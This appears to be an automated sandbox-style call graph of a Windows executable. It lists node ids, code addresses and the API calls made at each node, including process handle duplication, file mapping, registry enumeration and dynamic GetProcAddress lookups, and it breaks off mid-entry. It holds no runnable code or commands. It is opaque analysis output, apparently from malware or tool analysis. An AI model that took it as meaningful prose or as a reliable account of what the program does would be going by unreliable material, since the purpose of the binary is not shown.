40e5bb 39034->39036 39035 40e521 39035->39031 39073 40e175 39035->39073 39038 40e5c4 CloseHandle 39036->39038 39039 40e5cc 39036->39039 39038->39039 39041 40b633 free 39039->39041 39040 40e573 39043 40e584 39040->39043 39044 40e57c CloseHandle 39040->39044 39042 40e5db 39041->39042 39046 40b633 free 39042->39046 39094 40b1ab free free 39043->39094 39044->39043 39045 40e540 39045->39040 39093 40e2ab 30 API calls 39045->39093 39048 40e5e3 39046->39048 39048->39024 39051 406214 22 API calls 39050->39051 39052 40e03c 39051->39052 39053 40e16b 39052->39053 39054 40dd85 74 API calls 39052->39054 39053->39035 39055 40e06b 39054->39055 39055->39053 39056 40afcf ??2@YAPAXI ??3@YAXPAX 39055->39056 39057 40e08d OpenProcess 39056->39057 39058 40e0a4 GetCurrentProcess DuplicateHandle 39057->39058 39062 40e152 39057->39062 39059 40e0d0 GetFileSize 39058->39059 39060 40e14a CloseHandle 39058->39060 39063 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39059->39063 39060->39062 39061 40e160 39065 40b04b ??3@YAXPAX 39061->39065 39062->39061 39064 406214 22 API calls 39062->39064 39066 40e0ea 39063->39066 39064->39061 39065->39053 39067 4096dc CreateFileW 39066->39067 39068 40e0f1 CreateFileMappingW 39067->39068 39069 40e140 CloseHandle CloseHandle 39068->39069 39070 40e10b MapViewOfFile 39068->39070 39069->39060 39071 40e13b CloseHandle 39070->39071 39072 40e11f WriteFile UnmapViewOfFile 39070->39072 39071->39069 39072->39071 39074 40e18c 39073->39074 39075 406b90 11 API calls 39074->39075 39076 40e19f 39075->39076 39077 40e1a7 memset 39076->39077 39078 40e299 39076->39078 39083 40e1e8 39077->39083 39079 4069a3 ??3@YAXPAX free 39078->39079 39080 40e2a4 39079->39080 39080->39045 39081 406e8f 13 API calls 39081->39083 39082 406b53 SetFilePointerEx ReadFile 39082->39083 39083->39081 39083->39082 39084 40dd50 _wcsicmp 39083->39084 39085 40e283 39083->39085 39089 40742e 8 API calls 39083->39089 39090 40aae3 wcslen wcslen _memicmp 39083->39090 39091 40e244 _snwprintf 39083->39091 39084->39083 39086 40e291 39085->39086 39087 40e288 free 39085->39087 39088 40aa04 free 39086->39088 39087->39086 39088->39078 39089->39083 39090->39083 39092 40a8d0 7 API calls 39091->39092 39092->39083 39093->39045 39094->39031 39097 40a980 39095->39097 39096 40a8bb 39096->38956 39096->38957 39097->39096 39098 40a995 _wcsicmp 39097->39098 39099 40a99c wcscmp 39097->39099 39098->39097 39099->39097 39100->38960 39101->38964 39103 40aa23 RegEnumValueW 39102->39103 39103->38971 39103->38972 39105 405335 39104->39105 39106 40522a 39104->39106 39105->38552 39107 40b2cc 27 API calls 39106->39107 39108 405234 39107->39108 39109 40a804 8 API calls 39108->39109 39110 40523a 39109->39110 39149 40b273 39110->39149 39112 405248 _mbscpy _mbscat GetProcAddress 39113 40b273 27 API calls 39112->39113 39114 405279 39113->39114 39152 405211 GetProcAddress 39114->39152 39116 405282 39117 40b273 27 API calls 39116->39117 39118 40528f 39117->39118 39153 405211 GetProcAddress 39118->39153 39120 405298 39121 40b273 27 API calls 39120->39121 39122 4052a5 39121->39122 39154 405211 GetProcAddress 39122->39154 39124 4052ae 39125 40b273 27 API calls 39124->39125 39126 4052bb 39125->39126 39155 405211 GetProcAddress 39126->39155 39128 4052c4 39129 40b273 27 API calls 39128->39129 39130 4052d1 39129->39130 39156 405211 GetProcAddress 39130->39156 39132 4052da 39133 40b273 27 API calls 39132->39133 39134 4052e7 39133->39134 39157 405211 GetProcAddress 39134->39157 39136 4052f0 39137 40b273 27 API calls 39136->39137 39138 4052fd 39137->39138 39158 405211 GetProcAddress 39138->39158 39140 405306 39141 40b273 27 API calls 39140->39141 39142 405313 39141->39142 39159 405211 GetProcAddress 39142->39159 39144 40531c 39145 40b273 27 API calls 39144->39145 39146 405329 39145->39146 39160 405211 GetProcAddress 39146->39160 39148 405332 39148->39105 39150 40b58d 27 API calls 39149->39150 39151 40b18c 39150->39151 39151->39112 39152->39116 39153->39120 39154->39124 39155->39128 39156->39132 39157->39136 39158->39140 39159->39144 39160->39148 39162 405220 39 API calls 39161->39162 39163 405369 39162->39163 39163->38989 39163->38990 39164->38992 39165->38996 39166->38993 39167->38990 39169 40440c FreeLibrary 39168->39169 39170 40436d 39169->39170 39171 40a804 8 API calls 39170->39171 39172 404377 39171->39172 39173 404383 39172->39173 39174 404405 39172->39174 39175 40b273 27 API calls 39173->39175 39174->38564 39174->38566 39174->38567 39176 40438d GetProcAddress 39175->39176 39177 40b273 27 API calls 39176->39177 39178 4043a7 GetProcAddress 39177->39178 39179 40b273 27 API calls 39178->39179 39180 4043ba GetProcAddress 39179->39180 39181 40b273 27 API calls 39180->39181 39182 4043ce GetProcAddress 39181->39182 39183 40b273 27 API calls 39182->39183 39184 4043e2 GetProcAddress 39183->39184 39185 4043f1 39184->39185 39186 4043f7 39185->39186 39187 40440c FreeLibrary 39185->39187 39186->39174 39187->39174 39189 404413 FreeLibrary 39188->39189 39190 40441e 39188->39190 39189->39190 39190->38581 39191->38577 39193 40447e 39192->39193 39194 40442e 39192->39194 39193->38577 39195 40b2cc 27 API calls 39194->39195 39196 404438 39195->39196 39197 40a804 8 API calls 39196->39197 39198 40443e 39197->39198 39199 404445 39198->39199 39200 404467 39198->39200 39201 40b273 27 API calls 39199->39201 39200->39193 39203 404475 FreeLibrary 39200->39203 39202 40444f GetProcAddress 39201->39202 39202->39200 39204 404460 39202->39204 39203->39193 39204->39200 39206 4135f6 39205->39206 39207 4135eb FreeLibrary 39205->39207 39206->38584 39207->39206 39209 4449c4 39208->39209 39210 444a52 39208->39210 39211 40b2cc 27 API calls 39209->39211 39210->38601 39210->38602 39212 4449cb 39211->39212 39213 40a804 8 API calls 39212->39213 39214 4449d1 39213->39214 39215 40b273 27 API calls 39214->39215 39216 4449dc GetProcAddress 39215->39216 39217 40b273 27 API calls 39216->39217 39218 4449f3 GetProcAddress 39217->39218 39219 40b273 27 API calls 39218->39219 39220 444a04 GetProcAddress 39219->39220 39221 40b273 27 API calls 39220->39221 39222 444a15 GetProcAddress 39221->39222 39223 40b273 27 API calls 39222->39223 39224 444a26 GetProcAddress 39223->39224 39225 40b273 27 API calls 39224->39225 39226 444a37 GetProcAddress 39225->39226 39227 40b273 27 API calls 39226->39227 39229->38612 39230->38612 39231->38612 39232->38612 39233->38603 39235 403a29 39234->39235 39249 403bed memset memset 39235->39249 39237 403ae7 39262 40b1ab free free 39237->39262 39238 403a3f memset 39243 403a2f 39238->39243 39240 403aef 39240->38619 39241 409d1f 6 API calls 39241->39243 39242 409b98 GetFileAttributesW 39242->39243 39243->39237 39243->39238 39243->39241 39243->39242 39244 40a8d0 7 API calls 39243->39244 39244->39243 39246 40a051 GetFileTime CloseHandle 39245->39246 39247 4039ca CompareFileTime 39245->39247 39246->39247 39247->38619 39248->38620 39250 414c2e 15 API calls 39249->39250 39251 403c38 39250->39251 39252 409719 2 API calls 39251->39252 39253 403c3f wcscat 39252->39253 39254 414c2e 15 API calls 39253->39254 39255 403c61 39254->39255 39256 409719 2 API calls 39255->39256 39257 403c68 wcscat 39256->39257 39263 403af5 39257->39263 39260 403af5 20 API calls 39261 403c95 39260->39261 39261->39243 39262->39240 39264 403b02 39263->39264 39265 40ae18 9 API calls 39264->39265 39274 403b37 39265->39274 39266 403bdb 39268 40aebe FindClose 39266->39268 39267 40add4 wcscmp wcscmp 39267->39274 39269 403be6 39268->39269 39269->39260 39270 40a8d0 7 API calls 39270->39274 39271 40ae18 9 API calls 39271->39274 39272 40ae51 9 API calls 39272->39274 39273 40aebe FindClose 39273->39274 39274->39266 39274->39267 39274->39270 39274->39271 39274->39272 39274->39273 39276 409d1f 6 API calls 39275->39276 39277 404190 39276->39277 39290 409b98 GetFileAttributesW 39277->39290 39279 40419c 39280 4041a7 6 API calls 39279->39280 39281 40435c 39279->39281 39282 40424f 39280->39282 39281->38641 39282->39281 39284 40425e memset 39282->39284 39286 409d1f 6 API calls 39282->39286 39287 40a8ab 9 API calls 39282->39287 39291 414842 39282->39291 39284->39282 39285 404296 wcscpy 39284->39285 39285->39282 39286->39282 39288 4042b6 memset memset _snwprintf wcscpy 39287->39288 39288->39282 39289->38645 39290->39279 39294 41443e 39291->39294 39293 414866 39293->39282 39295 41444b 39294->39295 39296 414451 39295->39296 39297 4144a3 GetPrivateProfileStringW 39295->39297 39298 414491 39296->39298 39299 414455 wcschr 39296->39299 39297->39293 39301 414495 WritePrivateProfileStringW 39298->39301 39299->39298 39300 414463 _snwprintf 39299->39300 39300->39301 39301->39293 39302->38650 39304 40b2cc 27 API calls 39303->39304 39305 409615 39304->39305 39306 409d1f 6 API calls 39305->39306 39307 409625 39306->39307 39332 409b98 GetFileAttributesW 39307->39332 39309 409634 39310 409648 39309->39310 39333 4091b8 memset 39309->39333 39312 40b2cc 27 API calls 39310->39312 39314 408801 39310->39314 39313 40965d 39312->39313 39315 409d1f 6 API calls 39313->39315 39314->38653 39314->38698 39316 40966d 39315->39316 39385 409b98 GetFileAttributesW 39316->39385 39318 40967c 39318->39314 39319 409681 39318->39319 39386 409529 72 API calls 39319->39386 39321 409690 39321->39314 39322->38675 39332->39309 39387 40a6e6 WideCharToMultiByte 39333->39387 39335 409202 39388 444432 39335->39388 39338 40b273 27 API calls 39339 409236 39338->39339 39434 438552 39339->39434 39342 409383 39344 40b273 27 API calls 39342->39344 39346 409399 39344->39346 39348 438552 133 API calls 39346->39348 39367 4093a3 39348->39367 39352 4094ff 39463 443d90 39352->39463 39355 4251c4 136 API calls 39355->39367 39359 4093df 39462 424f26 122 API calls 39359->39462 39361 4253cf 17 API calls 39361->39367 39365 40951d 39365->39310 39367->39352 39367->39355 39367->39359 39367->39361 39369 4093e4 39367->39369 39460 4253af 17 API calls 39369->39460 39385->39318 39386->39321 39387->39335 39484 4438b5 39388->39484 39390 44444c 39396 409215 39390->39396 39498 415a6d 39390->39498 39392 4442e6 11 API calls 39394 44469e 39392->39394 39393 444486 39395 4444b9 memcpy 39393->39395 39433 4444a4 39393->39433 39394->39396 39398 443d90 110 API calls 39394->39398 39502 415258 39395->39502 39396->39338 39396->39365 39398->39396 39399 444524 39400 444541 39399->39400 39401 44452a 39399->39401 39505 444316 39400->39505 39402 416935 16 API calls 39401->39402 39402->39433 39405 444316 18 API calls 39406 444563 39405->39406 39407 444316 18 API calls 39406->39407 39433->39392 39572 438460 39434->39572 39436 409240 39436->39342 39437 4251c4 39436->39437 39584 424f07 39437->39584 39439 4251e4 39440 4251f7 39439->39440 39441 4251e8 39439->39441 39592 4250f8 39440->39592 39462->39352 39485 4438d0 39484->39485 39491 4438c9 39484->39491 39486 415378 memcpy memcpy 39485->39486 39487 4438d5 39486->39487 39488 4154e2 10 API calls 39487->39488 39489 443906 39487->39489 39487->39491 39488->39489 39490 443970 memset 39489->39490 39489->39491 39492 44398b 39490->39492 39491->39390 39494 41975c 10 API calls 39492->39494 39496 4439a0 39492->39496 39493 415700 10 API calls 39495 4439c0 39493->39495 39494->39496 39495->39491 39497 418981 10 API calls 39495->39497 39496->39491 39496->39493 39497->39491 39499 415a77 39498->39499 39500 415a8d 39499->39500 39501 415a7e memset 39499->39501 39500->39393 39501->39500 39503 4438b5 11 API calls 39502->39503 39504 41525d 39503->39504 39504->39399 39506 444328 39505->39506 39507 444423 39506->39507 39508 44434e 39506->39508 39509 4446ea 11 API calls 39507->39509 39510 432d4e memset memset memcpy 39508->39510 39516 444381 39509->39516 39511 44435a 39510->39511 39513 444375 39511->39513 39518 44438b 39511->39518 39512 432d4e memset memset memcpy 39514 4443ec 39512->39514 39515 416935 16 API calls 39513->39515 39514->39516 39515->39516 39516->39405 39518->39512 39573 41703f 11 API calls 39572->39573 39574 43847a 39573->39574 39575 43848a 39574->39575 39576 43847e 39574->39576 39578 438270 133 API calls 39575->39578 39577 4446ea 11 API calls 39576->39577 39580 438488 39577->39580 39579 4384aa 39578->39579 39579->39580 39581 424f26 122 API calls 39579->39581 39580->39436 39582 4384bb 39581->39582 39583 438270 133 API calls 39582->39583 39583->39580 39585 424f1f 39584->39585 39586 424f0c 39584->39586 39588 424eea 11 API calls 39585->39588 39587 416760 11 API calls 39586->39587 39589 424f18 39587->39589 39590 424f24 39588->39590 39589->39439 39590->39439 39641 413f4f 39614->39641 39617 413f37 K32GetModuleFileNameExW 39618 413f4a 39617->39618 39618->38712 39620 413969 wcscpy 39619->39620 39621 41396c wcschr 39619->39621 39624 413a3a 39620->39624 39621->39620 39623 41398e 39621->39623 39646 4097f7 wcslen wcslen _memicmp 39623->39646 39624->38712 39626 41399a 39627 4139a4 memset 39626->39627 39628 4139e6 39626->39628 39647 409dd5 GetWindowsDirectoryW wcscpy 39627->39647 39629 413a31 wcscpy 39628->39629 39630 4139ec memset 39628->39630 39629->39624 39648 409dd5 GetWindowsDirectoryW wcscpy 39630->39648 39632 4139c9 wcscpy wcscat 39632->39624 39634 413a11 memcpy wcscat 39634->39624 39636 413cb0 GetModuleHandleW 39635->39636 39637 413cda 39635->39637 39636->39637 39638 413cbf GetProcAddress 39636->39638 39639 413ce3 GetProcessTimes 39637->39639 39640 413cf6 39637->39640 39638->39637 39639->38715 39640->38715 39642 413f2f 39641->39642 39643 413f54 39641->39643 39642->39617 39642->39618 39644 40a804 8 API calls 39643->39644 39645 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39644->39645 39645->39642 39646->39626 39647->39632 39648->39634 39649->38736 39650->38758 39652 409cf9 GetVersionExW 39651->39652 39653 409d0a 39651->39653 39652->39653 39653->38765 39653->38770 39654->38771 39655->38774 39656->38776 39657->38842 39659 40bba5 39658->39659 39706 40cc26 39659->39706 39662 40bd4b 39727 40cc0c 39662->39727 39667 40b2cc 27 API calls 39668 40bbef 39667->39668 39734 40ccf0 _wcsicmp 39668->39734 39670 40bbf5 39670->39662 39735 40ccb4 6 API calls 39670->39735 39672 40bc26 39673 40cf04 17 API calls 39672->39673 39674 40bc2e 39673->39674 39675 40bd43 39674->39675 39676 40b2cc 27 API calls 39674->39676 39677 40cc0c 4 API calls 39675->39677 39678 40bc40 39676->39678 39677->39662 39736 40ccf0 _wcsicmp 39678->39736 39680 40bc46 39680->39675 39681 40bc61 memset memset WideCharToMultiByte 39680->39681 39737 40103c strlen 39681->39737 39683 40bcc0 39684 40b273 27 API calls 39683->39684 39685 40bcd0 memcmp 39684->39685 39685->39675 39686 40bce2 39685->39686 39687 404423 37 API calls 39686->39687 39688 40bd10 39687->39688 39688->39675 39689 40bd3a LocalFree 39688->39689 39690 40bd1f memcpy 39688->39690 39689->39675 39690->39689 39691->38857 39693 409a74 GetTempFileNameW 39692->39693 39694 409a66 GetWindowsDirectoryW 39692->39694 39693->38854 39694->39693 39695->38892 39696->38892 39697->38892 39698->38892 39699->38892 39700->38892 39701->38892 39702->38892 39703->38892 39704->38867 39705->38889 39738 4096c3 CreateFileW 39706->39738 39708 40cc34 39709 40cc3d GetFileSize 39708->39709 39710 40bbca 39708->39710 39711 40afcf 2 API calls 39709->39711 39710->39662 39718 40cf04 39710->39718 39712 40cc64 39711->39712 39739 40a2ef ReadFile 39712->39739 39714 40cc71 39740 40ab4a MultiByteToWideChar 39714->39740 39716 40cc95 CloseHandle 39717 40b04b ??3@YAXPAX 39716->39717 39717->39710 39719 40b633 free 39718->39719 39720 40cf14 39719->39720 39746 40b1ab free free 39720->39746 39722 40bbdd 39722->39662 39722->39667 39723 40cf1b 39723->39722 39725 40cfef 39723->39725 39747 40cd4b 39723->39747 39726 40cd4b 14 API calls 39725->39726 39726->39722 39728 40b633 free 39727->39728 39729 40cc15 39728->39729 39730 40aa04 free 39729->39730 39731 40cc1d 39730->39731 39796 40b1ab free free 39731->39796 39733 40b7d4 memset CreateFileW 39733->38848 39733->38849 39734->39670 39735->39672 39736->39680 39737->39683 39738->39708 39739->39714 39741 40ab6b 39740->39741 39745 40ab93 39740->39745 39742 40a9ce 4 API calls 39741->39742 39743 40ab74 39742->39743 39744 40ab7c MultiByteToWideChar 39743->39744 39744->39745 39745->39716 39746->39723 39748 40cd7b 39747->39748 39781 40aa29 39748->39781 39750 40cef5 39751 40aa04 free 39750->39751 39752 40cefd 39751->39752 39752->39723 39754 40aa29 6 API calls 39755 40ce1d 39754->39755 39756 40aa29 6 API calls 39755->39756 39757 40ce3e 39756->39757 39758 40ce6a 39757->39758 39789 40abb7 wcslen memmove 39757->39789 39759 40ce9f 39758->39759 39792 40abb7 wcslen memmove 39758->39792 39761 40a8d0 7 API calls 39759->39761 39764 40ceb5 39761->39764 39762 40ce56 39790 40aa71 wcslen 39762->39790 39771 40a8d0 7 API calls 39764->39771 39766 40ce8b 39793 40aa71 wcslen 39766->39793 39768 40ce5e 39791 40abb7 wcslen memmove 39768->39791 39769 40ce93 39794 40abb7 wcslen memmove 39769->39794 39773 40cecb 39771->39773 39795 40d00b malloc memcpy free free 39773->39795 39775 40cedd 39776 40aa04 free 39775->39776 39777 40cee5 39776->39777 39778 40aa04 free 39777->39778 39779 40ceed 39778->39779 39780 40aa04 free 39779->39780 39780->39750 39782 40aa33 39781->39782 39788 40aa63 39781->39788 39783 40aa44 39782->39783 39784 40aa38 wcslen 39782->39784 39785 40a9ce malloc memcpy free free 39783->39785 39784->39783 39786 40aa4d 39785->39786 39787 40aa51 memcpy 39786->39787 39786->39788 39787->39788 39788->39750 39788->39754 39789->39762 39790->39768 39791->39758 39792->39766 39793->39769 39794->39759 39795->39775 39796->39733 39797->38907 39798->38915 39875 44def7 39876 44df07 39875->39876 39877 44df00 ??3@YAXPAX 39875->39877 39878 44df17 39876->39878 39879 44df10 ??3@YAXPAX 39876->39879 39877->39876 39880 44df27 39878->39880 39881 44df20 ??3@YAXPAX 39878->39881 39879->39878 39882 44df37 39880->39882 39883 44df30 ??3@YAXPAX 39880->39883 39881->39880 39883->39882 37675 44dea5 37676 44deb5 FreeLibrary 37675->37676 37677 44dec3 37675->37677 37676->37677 39884 4148b6 FindResourceW 39885 4148f9 39884->39885 39886 4148cf SizeofResource 39884->39886 39886->39885 39887 4148e0 LoadResource 39886->39887 39887->39885 39888 4148ee LockResource 39887->39888 39888->39885 37854 415304 free 39799 427533 39802 427548 39799->39802 39813 425711 39799->39813 39800 4259da 39856 416760 11 API calls 39800->39856 39801 4275cb 39836 425506 39801->39836 39802->39801 39809 429b7a 39802->39809 39804 4259c2 39832 425ad6 39804->39832 39850 415c56 11 API calls 39804->39850 39805 4260dd 39857 424251 119 API calls 39805->39857 39862 4446ce 11 API calls 39809->39862 39812 429a4d 39818 429a66 39812->39818 39819 429a9b 39812->39819 39813->39800 39813->39804 39813->39812 39816 422aeb memset memcpy memcpy 39813->39816 39821 4260a1 39813->39821 39828 429ac1 39813->39828 39835 425a38 39813->39835 39846 4227f0 memset memcpy 39813->39846 39847 422b84 15 API calls 39813->39847 39848 422b5d memset memcpy memcpy 39813->39848 39849 422640 13 API calls 39813->39849 39851 4241fc 11 API calls 39813->39851 39852 42413a 89 API calls 39813->39852 39816->39813 39858 415c56 11 API calls 39818->39858 39820 429a96 39819->39820 39860 416760 11 API calls 39819->39860 39861 424251 119 API calls 39820->39861 39855 415c56 11 API calls 39821->39855 39828->39800 39828->39832 39863 415c56 11 API calls 39828->39863 39829 429a7a 39859 416760 11 API calls 39829->39859 39835->39804 39853 422640 13 API calls 39835->39853 39854 4226e0 12 API calls 39835->39854 39837 425554 39836->39837 39838 42554d 39836->39838 39865 422586 12 API calls 39837->39865 39864 423b34 102 API calls 39838->39864 39841 425567 39842 4255ba 39841->39842 39843 42556c memset 39841->39843 39842->39813 39844 425596 39843->39844 39844->39842 39845 4255a4 memset 39844->39845 39845->39842 39846->39813 39847->39813 39848->39813 39849->39813 39850->39800 39851->39813 39852->39813 39853->39835 39854->39835 39855->39800 39856->39805 39857->39832 39858->39829 39859->39820 39860->39820 39861->39828 39862->39828 39863->39800 39864->39837 39865->39841 39889 441b3f 39899 43a9f6 39889->39899 39891 441b61 40072 4386af memset 39891->40072 39893 44189a 39894 4418e2 39893->39894 39895 442bd4 39893->39895 39896 4418ea 39894->39896 40073 4414a9 12 API calls 39894->40073 39895->39896 40074 441409 memset 39895->40074 39900 43aa20 39899->39900 39901 43aadf 39899->39901 39900->39901 39902 43aa34 memset 39900->39902 39901->39891 39903 43aa56 39902->39903 39904 43aa4d 39902->39904 40075 43a6e7 39903->40075 40083 42c02e memset 39904->40083 39909 43aad3 40085 4169a7 11 API calls 39909->40085 39910 43aaae 39910->39901 39910->39909 39925 43aae5 39910->39925 39911 43ac18 39914 43ac47 39911->39914 40087 42bbd5 memcpy memcpy memcpy memset memcpy 39911->40087 39915 43aca8 39914->39915 40088 438eed 16 API calls 39914->40088 39918 43acd5 39915->39918 40090 4233ae 11 API calls 39915->40090 40091 423426 11 API calls 39918->40091 39919 43ac87 40089 4233c5 16 API calls 39919->40089 39923 43ace1 40092 439811 162 API calls 39923->40092 39924 43a9f6 160 API calls 39924->39925 39925->39901 39925->39911 39925->39924 40086 439bbb 22 API calls 39925->40086 39927 43acfd 39933 43ad2c 39927->39933 40093 438eed 16 API calls 39927->40093 39929 43ad19 40094 4233c5 16 API calls 39929->40094 39930 43ad58 40095 44081d 162 API calls 39930->40095 39933->39930 39936 43add9 39933->39936 39935 43ae3a memset 39937 43ae73 39935->39937 39936->39936 40099 423426 11 API calls 39936->40099 40100 42e1c0 146 API calls 39937->40100 39938 43adab 40097 438c4e 162 API calls 39938->40097 39941 43ad6c 39941->39901 39941->39938 40096 42370b memset memcpy memset 39941->40096 39942 43adcc 40098 440f84 12 API calls 39942->40098 39943 43ae96 40101 42e1c0 146 API calls 39943->40101 39947 43aea8 39948 43aec1 39947->39948 40102 42e199 146 API calls 39947->40102 39950 43af00 39948->39950 40103 42e1c0 146 API calls 39948->40103 39950->39901 39953 43af1a 39950->39953 39954 43b3d9 39950->39954 40104 438eed 16 API calls 39953->40104 39961 43b4c8 39954->39961 39962 43b3f6 39954->39962 39956 43b60f 39956->39901 40163 4393a5 17 API calls 39956->40163 39957 43af2f 40105 4233c5 16 API calls 39957->40105 39960 43af51 40106 423426 11 API calls 39960->40106 39964 43b4f2 39961->39964 40151 42bbd5 memcpy memcpy memcpy memset memcpy 39961->40151 40145 432878 12 API calls 39962->40145 40152 43a76c 21 API calls 39964->40152 39966 43af7d 40107 423426 11 API calls 39966->40107 39970 43b529 40153 44081d 162 API calls 39970->40153 39971 43b462 40147 423330 11 API calls 39971->40147 39972 43af94 40108 423330 11 API calls 39972->40108 39976 43b47e 39980 43b497 39976->39980 40148 42374a memcpy memset memcpy memcpy memcpy 39976->40148 39977 43b544 39981 43b55c 39977->39981 40154 42c02e memset 39977->40154 39978 43b428 39978->39971 40146 432b60 16 API calls 39978->40146 39979 43afca 40109 423330 11 API calls 39979->40109 40149 4233ae 11 API calls 39980->40149 40155 43a87a 162 API calls 39981->40155 39983 43afdb 40110 4233ae 11 API calls 39983->40110 39989 43b56c 39992 43b58a 39989->39992 40156 423330 11 API calls 39989->40156 39990 43b4b1 40150 423399 11 API calls 39990->40150 39991 43afee 40111 44081d 162 API calls 39991->40111 40157 440f84 12 API calls 39992->40157 39997 43b4c1 40159 42db80 162 API calls 39997->40159 39999 43b592 40158 43a82f 16 API calls 39999->40158 40002 43b5b4 40160 438c4e 162 API calls 40002->40160 40004 43b5cf 40161 42c02e memset 40004->40161 40006 43b1ef 40122 4233c5 16 API calls 40006->40122 40007 43b005 40007->39901 40010 43b01f 40007->40010 40112 42d836 162 API calls 40007->40112 40010->40006 40120 423330 11 API calls 40010->40120 40121 42d71d 162 API calls 40010->40121 40011 43b212 40123 423330 11 API calls 40011->40123 40012 43b087 40113 4233ae 11 API calls 40012->40113 40014 43add4 40014->39956 40162 438f86 16 API calls 40014->40162 40018 43b22a 40124 42ccb5 11 API calls 40018->40124 40020 43b23f 40125 4233ae 11 API calls 40020->40125 40021 43b10f 40116 423330 11 API calls 40021->40116 40023 43b257 40126 4233ae 11 API calls 40023->40126 40027 43b129 40117 4233ae 11 API calls 40027->40117 40028 43b26e 40127 4233ae 11 API calls 40028->40127 40031 43b09a 40031->40021 40114 42cc15 19 API calls 40031->40114 40115 4233ae 11 API calls 40031->40115 40032 43b282 40128 43a87a 162 API calls 40032->40128 40034 43b13c 40118 440f84 12 API calls 40034->40118 40036 43b29d 40129 423330 11 API calls 40036->40129 40039 43b15f 40119 4233ae 11 API calls 40039->40119 40040 43b2af 40042 43b2b8 40040->40042 40043 43b2ce 40040->40043 40130 4233ae 11 API calls 40042->40130 40131 440f84 12 API calls 40043->40131 40046 43b2da 40132 42370b memset memcpy memset 40046->40132 40047 43b2c9 40133 4233ae 11 API calls 40047->40133 40050 43b2f9 40134 423330 11 API calls 40050->40134 40052 43b30b 40135 423330 11 API calls 40052->40135 40054 43b325 40136 423399 11 API calls 40054->40136 40056 43b332 40137 4233ae 11 API calls 40056->40137 40058 43b354 40138 423399 11 API calls 40058->40138 40060 43b364 40139 43a82f 16 API calls 40060->40139 40062 43b370 40140 42db80 162 API calls 40062->40140 40064 43b380 40141 438c4e 162 API calls 40064->40141 40066 43b39e 40142 423399 11 API calls 40066->40142 40068 43b3ae 40143 43a76c 21 API calls 40068->40143 40070 43b3c3 40144 423399 11 API calls 40070->40144 40072->39893 40073->39896 40074->39895 40076 43a6f5 40075->40076 40077 43a765 40075->40077 40076->40077 40164 42a115 40076->40164 40077->39901 40084 4397fd memset 40077->40084 40081 43a73d 40081->40077 40082 42a115 146 API calls 40081->40082 40082->40077 40083->39903 40084->39910 40085->39901 40086->39925 40087->39914 40088->39919 40089->39915 40090->39918 40091->39923 40092->39927 40093->39929 40094->39933 40095->39941 40096->39938 40097->39942 40098->40014 40099->39935 40100->39943 40101->39947 40102->39948 40103->39948 40104->39957 40105->39960 40106->39966 40107->39972 40108->39979 40109->39983 40110->39991 40111->40007 40112->40012 40113->40031 40114->40031 40115->40031 40116->40027 40117->40034 40118->40039 40119->40010 40120->40010 40121->40010 40122->40011 40123->40018 40124->40020 40125->40023 40126->40028 40127->40032 40128->40036 40129->40040 40130->40047 40131->40046 40132->40047 40133->40050 40134->40052 40135->40054 40136->40056 40137->40058 40138->40060 40139->40062 40140->40064 40141->40066 40142->40068 40143->40070 40144->40014 40145->39978 40146->39971 40147->39976 40148->39980 40149->39990 40150->39997 40151->39964 40152->39970 40153->39977 40154->39981 40155->39989 40156->39992 40157->39999 40158->39997 40159->40002 40160->40004 40161->40014 40162->39956 40163->39901 40165 42a175 40164->40165 40167 42a122 40164->40167 40165->40077 40170 42b13b 146 API calls 40165->40170 40167->40165 40168 42a115 146 API calls 40167->40168 40171 43a174 40167->40171 40195 42a0a8 146 API calls 40167->40195 40168->40167 40170->40081 40185 43a196 40171->40185 40186 43a19e 40171->40186 40172 43a306 40172->40185 40204 4388c4 14 API calls 40172->40204 40175 42a115 146 API calls 40175->40186 40177 43a642 40177->40185 40225 4169a7 11 API calls 40177->40225 40181 43a635 40224 42c02e memset 40181->40224 40185->40167 40186->40172 40186->40175 40186->40185 40196 42ff8c 40186->40196 40212 415a91 40186->40212 40216 4165ff 40186->40216 40219 439504 13 API calls 40186->40219 40220 4312d0 146 API calls 40186->40220 40221 42be4c memcpy memcpy memcpy memset memcpy 40186->40221 40222 43a121 11 API calls 40186->40222 40188 42bf4c 14 API calls 40190 43a325 40188->40190 40189 4169a7 11 API calls 40189->40190 40190->40177 40190->40181 40190->40185 40190->40188 40190->40189 40191 42b5b5 memset memcpy 40190->40191 40194 4165ff 11 API calls 40190->40194 40205 42b63e 40190->40205 40223 42bfcf memcpy 40190->40223 40191->40190 40194->40190 40195->40167 40226 43817e 40196->40226 40198 42ff9d 40198->40186 40199 42ff99 40199->40198 40200 42ffe3 40199->40200 40201 42ffd0 40199->40201 40231 4169a7 11 API calls 40200->40231 40230 4169a7 11 API calls 40201->40230 40204->40190 40380 42b4ec 40205->40380 40207 42b64c 40386 42b5e4 memset 40207->40386 40209 42b65e 40211 42b66d 40209->40211 40387 42b3c6 11 API calls 40209->40387 40211->40190 40213 415a9d 40212->40213 40214 415ab3 40213->40214 40215 415aa4 memset 40213->40215 40214->40186 40215->40214 40388 4165a0 40216->40388 40219->40186 40220->40186 40221->40186 40222->40186 40223->40190 40224->40177 40225->40185 40227 438187 40226->40227 40229 438192 40226->40229 40232 4380f6 40227->40232 40229->40199 40230->40198 40231->40198 40234 43811f 40232->40234 40233 438164 40233->40229 40234->40233 40237 437e5e 40234->40237 40260 4300e8 memset memset memcpy 40234->40260 40261 437d3c 40237->40261 40239 437eb3 40239->40234 40240 437ea9 40240->40239 40246 437f22 40240->40246 40276 41f432 40240->40276 40243 437f06 40323 415c56 11 API calls 40243->40323 40244 437f7f 40247 437f95 40244->40247 40250 43802b 40244->40250 40246->40244 40248 432d4e 3 API calls 40246->40248 40324 415c56 11 API calls 40247->40324 40248->40244 40251 4165ff 11 API calls 40250->40251 40252 438054 40251->40252 40287 437371 40252->40287 40255 43806b 40256 438094 40255->40256 40325 42f50e 137 API calls 40255->40325 40258 437fa3 40256->40258 40326 4300e8 memset memset memcpy 40256->40326 40258->40239 40327 41f638 103 API calls 40258->40327 40260->40234 40262 437d69 40261->40262 40265 437d80 40261->40265 40328 437ccb 11 API calls 40262->40328 40264 437d76 40264->40240 40265->40264 40266 437da3 40265->40266 40268 437d90 40265->40268 40269 438460 133 API calls 40266->40269 40268->40264 40332 437ccb 11 API calls 40268->40332 40272 437dcb 40269->40272 40270 437de8 40331 424f26 122 API calls 40270->40331 40272->40270 40329 444283 13 API calls 40272->40329 40274 437dfc 40330 437ccb 11 API calls 40274->40330 40277 41f54d 40276->40277 40283 